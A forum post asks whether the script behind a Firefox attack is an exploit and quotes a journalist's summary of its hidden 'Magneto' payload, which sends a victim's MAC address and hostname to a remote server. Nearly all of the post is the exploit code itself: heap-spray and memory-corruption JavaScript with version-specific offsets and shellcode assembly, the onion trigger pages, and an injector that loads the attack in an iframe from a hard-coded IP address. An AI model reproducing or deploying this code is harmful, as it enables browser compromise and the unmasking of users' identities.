Is this a 'sploit, or is it just making use of some basic flaw in how Firefox handles these questions? We have a browser vulns thread here with all sorts of info on this subject... perhaps folks can explain, who have closer direct expertise in this. It is interesting that the useragent (NT) and browser type (Firefox) filter is so rigidly applied. They don't even waste time with other platforms or browser codebase, eh?
- edited to add: Kevin Poulsen has a typically excellent, timely summary of what's going on with this js (which, as expected, I failed entirely to see). Quoting from his piece:
He cites Vlad Tsrklevich as the source of the deobfuscation and code analysis: here's the underlying report.The heart of the malicious Javascript is a tiny Windows executable hidden in a variable named “Magneto”. A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box.
But the Magneto code doesn’t download anything. It looks up the victim’s MAC address – a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sends it to the Virginia server coded as a standard HTTP web request.
Whilst the github link is far more useful for code review, in case folks don't want to have to jump over there, here's the version of the code (I keep wanting to call it "script," apologies

Code: Select all
//nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
</body>
</html>
<script>
var var1=0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5=0xFF004;
var var6=0x3FC01;
var var7=0x60000000;
var var8=0x18000000;
var var9=1;
var var10 = 0x12000000;
var var11 = 0;
var var12=0;
var var13 =0;
function df()
{
if(var12==0)
{
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if( var9 == 1 || var9 == 2)
return ( var14 - var12);
else
return 0x00000000;
}
function b()
{
var version = al();
if(version <17)
{
window.location.href="content_1.html";
}
if( version >=17 && version <18 )
var12 = 0xE8;
return ;
}
function c()
{
var iframe=document.getElementById("iframe");
iframe.src="content_2.html";
}
function d()
{
for(var j=0;j<var1;j++)
{
if( j<var1/8 || j==var1-1)
{
var tabb = new Array(0x1ED00);
var4[j]=tabb;
for(i=0;i<0x1ED00;i++)
{
var4[j][i]=0x11559944;
}
}
var2[j]= new ArrayBuffer(var5);
}
for(var j=0;j<var1;j++)
{
var3[j]= new Int32Array(var2[j],0,var6);
var3[j][0]=0x11336688;
for(var i=1;i<16;i++)
{
var3[j][0x4000*i] = 0x11446688;
}
}
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
var4[j][0]=0x22556611;
}
}
}
function e(view)
{
var i=0;
for(i=0;i<0x400;i++)
{
view[i] = var13+0x1010 ;
}
view[0x0]=var13+0x1010;
view[0x44]=0x0;
view[0x45]=0x0;
view[0x400-4]=var13+0x1010;
view[0x400]=0x00004004;
view[0x401]=0x7FFE0300;
}
function f(var15,view,var16)
{
var magneto = "";
{see below}
var var29 = magneto;
var var17 = "\u9060";
var var18 = "\u9061";
var var19 = "\uC481\u0000\u0008" ;
var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = "\uE589";
var var23 ="\uC3C9";
var var24 = "\uE889";
var24 += "\u608D\u90C0";
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16*4
var var27 =""
var27 += "\uB890\u2020\u2020";
var27 += "\uA390"+ae(var26+0x00);
var27 += "\uA390"+ae(var26+0x04);
var27 += "\uA390"+ae(var26+0x08);
var27 += "\uA390"+ae(var26+0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
var var29Array = new Array();
var29Array=ag(var28);
var var29Ad = var13+0x5010;
var i=0;
var j=0;
var var30=var13+0x4048;
var var31 = new Array();
var31[0]=var30;
var31[1]=var30;
var31[2]=var30;
var31[3]=var15[1];
var31[4]=var29Ad;
var31[5]=0xFFFFFFFF;
var31[6]=var13+0x4044;
var31[7]=var13+0x4040;
var31[8]=0x00000040;
var31[9]=var13+0x4048;
var31[10]=0x00040000;
var31[11]=var29Ad;
var31[12]=var13+0x301C;
for(var i=0 ; i < 0x140 ; i++)
{
var31[i+15]=var15[0];
}
var var32 = 0x3F8;
view[0x800+0+var32]=var13+0x4018;
view[0x800+1+var32]=var13+0x4018;
for(var i=2 ; i < var31.length ; i++)
{
view[0x800+i+var32]= 0x41414141;
}
for(var i=0 ; i < var31.length ; i++)
{
view[0xC02+i+var32]= var31[i];
}
for(var i=0 ; i < var29Array.length ; i++)
{
view[0x1000 + i+var32] = var29Array[i];
}
}
function g(var50,view)
{
var k = h(var50,view);
var j=0;
if( k < 0 )
return -1;
view[0x404+k]=var13+0x3010;
return 1;
}
function h(var50,view)
{
var address=0;
var u=0;
var memory="";
var var55=0;
for( u =7; u >=4 ;u--)
{
address=view[0x404+u];
if( address > 0x000A0000 && address < 0x80000000 )
{
memory = i(address,0x48,var50,view);
var55=af(memory[0x14]+memory[0x15]);
if(var55==address)
{
return u;
}
}
}
return -1;
}
function i(address,size,var50,view)
{
var var56 = size/2;
var56 = var56*0x10 +0x04;
view[0x400]=var56;
view[0x401]=address;
return var4[var50][0];
}
function j(memory,view)
{
var intArray=ag(memory);
for(var i=0 ; i < intArray.length ; i++)
{
view[0x404+i]=intArray[i];
}
}
function k()
{
for(var j=0;j<var1;j++)
{
if(var2[j].byteLength!=var5)
{
return j;
}
}
return -1;
}
function l(view,var58)
{
view[var58] = var13 + 0x1030;
view[var58+1] = 0xFFFFFF85;
}
function m(view,var58)
{
view[var58]=0x00000000;
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
if(var4[j][0]!=0x22556611)
return j;
}
}
return -1
}
function n(view,firstvar58)
{
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58=0;
for(var i=0;i<200;i++)
{
if(view[var58] != 0x11336688)
{
if(view[var58] == 0x22556611 )
return var58;
else
return -1;
}
if(var58==0)
{
var58 = firstvar58;
}else{
var var59=view[var58-0x0C];
var58 = (var59 - var57)/4;
}
}
return -1;
}
function o(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
var var59 = view[0x00100000/4-0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 - var57)/4);
}
function p()
{
for(var j=0;j<var1;j++)
{
for(var i=1;i<16;i++)
{
if(var3[j][i*0x4000-0x02]==0x01000000)
{
return -i;
}
}
}
return 0;
}
function q(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var7;
if(var2[var60+1].byteLength==var7)
return var60+1;
return -1;
}
function r(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var5;
}
function t()
{
if(typeof sessionStorage.tempStor !="undefined")
return false;
sessionStorage.tempStor="";
return true;
}
function u()
{
if( t() == true )
{
var9 = 1;
b();
d();
c();
}else{
return ;
}
}
function v()
{
if(k() == -1)
{
var11 = p();
var9 = 2;
c();
}else{
x();
}
}
function w()
{
if(var9==1)
v();
else
x();
}
function x()
{
var var60 = k();
if(var60==-1)
return ;
var nextvar60 = q(var60);
if(nextvar60==-1)
return ;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60],0,var8);
var var58 = n(var62,var61);
if(var58==-1)
return ;
var var50 = m(var62,var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62,var58);
var var64 = var4[var50][0];
ac(var64,var50,var62,var58,var60);
}
function y(index)
{
var4[index][1]= document.createElement('span') ;
}
function z(index,index2)
{
var4[index][1].innerHTML;
}
function aa(view,var63)
{
return view[var63];
}
function ab(address,view,var63)
{
view[var63]=address;
}
function ac(var64,var50,var62,var58,var60)
{
var var15=ah(var64);
f(var15,var62,var58);
y(var50);
var var66 = aa(var62,var58+2);
var var67 = i(var66,0x40,var50,var62) ;
j(var67,var62);
g(var50,var62);
ab(var13+0x1040 ,var62,var58+2);
r(var60)
setTimeout(ad,1000);
z(var50);
}
function ad()
{
for(var j=0;j<var1;j++)
{
delete var3[j]
var3[j]= null;
delete var2[j];
var2[j] = null;
if(typeof var4[j] !="undefined")
{
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2=null;
var3=null;
var4=null;
}
function ae(int32)
{
var var68 = String.fromCharCode((int32)& 0x0000FFFF);
var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
return var68+var69;
}
function af(string)
{
var var70 = string.charCodeAt(0);
var var71 = string.charCodeAt(1);
var var72 = (var71 << 16) + var70;
return var72;
}
function ag(string)
{
if(string.length%2!=0)
string+="\u9090";
var intArray= new Array();
for(var i=0 ; i*2 < string.length; i++ )
intArray[i]=af(string[i*2]+string[i*2+1]);
return intArray;
}
function ah(var73)
{
var var74 = var73.substring(0,2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0)
{
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1)
{
return;
}
return var15
}
function aj(version)
{
var i = navigator.userAgent.indexOf("Windows NT");
if (i != -1)
return true;
return false;
}
function ak()
{
var ua = navigator.userAgent;
var browser = ua.substring(0, ua.lastIndexOf("/"));
browser = browser.substring(browser.lastIndexOf(" ") + 1);
if (browser != "Firefox")
return -1;
var version = ua.substring(ua.lastIndexOf("/") + 1);
version = parseInt(version.substring(0, version.lastIndexOf(".")));
return version;
}
function al()
{
version = ak();
if (!aj(version))
return -1;
return version;
}
function am(var77)
{
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510)
{
var78 = var77 - 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
else if (var77 % 0x10000 == 0x9A90)
{
var78 = var77 - 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
else if (var77 % 0x10000 == 0x5E70)
{
var78 = var77 - 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
else if (var77 % 0x10000 == 0x35F3)
{
var78 = var77 - 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
else if (var77 % 0x10000 == 0x5CA0)
{
var78 = var77 - 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
else if (var77 % 0x10000 == 0x5CD0)
{
var78 = var77 - 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
else if (var77 % 0x10000 == 0x6190)
{
var78 = var77 - 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
else if (var77 % 0x10000 == 0x9CB9)
{
var78 = var77 - 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
else if (var77 % 0x10000 == 0x9CE9)
{
var78 = var77 - 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
else if (var77 % 0x10000 == 0x70B0)
{
var78 = var77 - 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x7090)
{
var78 = var77 - 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x9E49)
{
var78 = var77 - 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
else if (var77 % 0x10000 == 0x9E69)
{
var78 = var77 - 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
else if (var77 % 0x10000 == 0x9EB9)
{
var78 = var77 - 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else
{
return -1;
}
return var15;
}
window.addEventListener("onload", u(),true);
</script>
nl7qbezu7pqsuone.onion/content_2.html:
<html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
nl7qbezu7pqsuone.onion/content_3.html:
<script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
</script>
Code: Select all
function createCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function isFF() {
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
var iframe = document.createElement('iframe');
iframe.style.display = "inline";
iframe.frameBorder = "0";
iframe.scrolling = "no";
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
iframe.height = "5";
iframe.width = "*";
document.body.appendChild(iframe);
}
function freedomhost() {
if ( ! readCookie("n_serv") ) {
createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
updatify();
}
}
function isReady()
{
if ( document.readyState === "interactive" || document.readyState === "complete" ) {
if ( isFF() ) {
//window.alert(window.location + "Firefox Detected.")
freedomhost();
}
}
else
{
setTimeout(isReady, 250);
}
}
setTimeout(isReady, 250);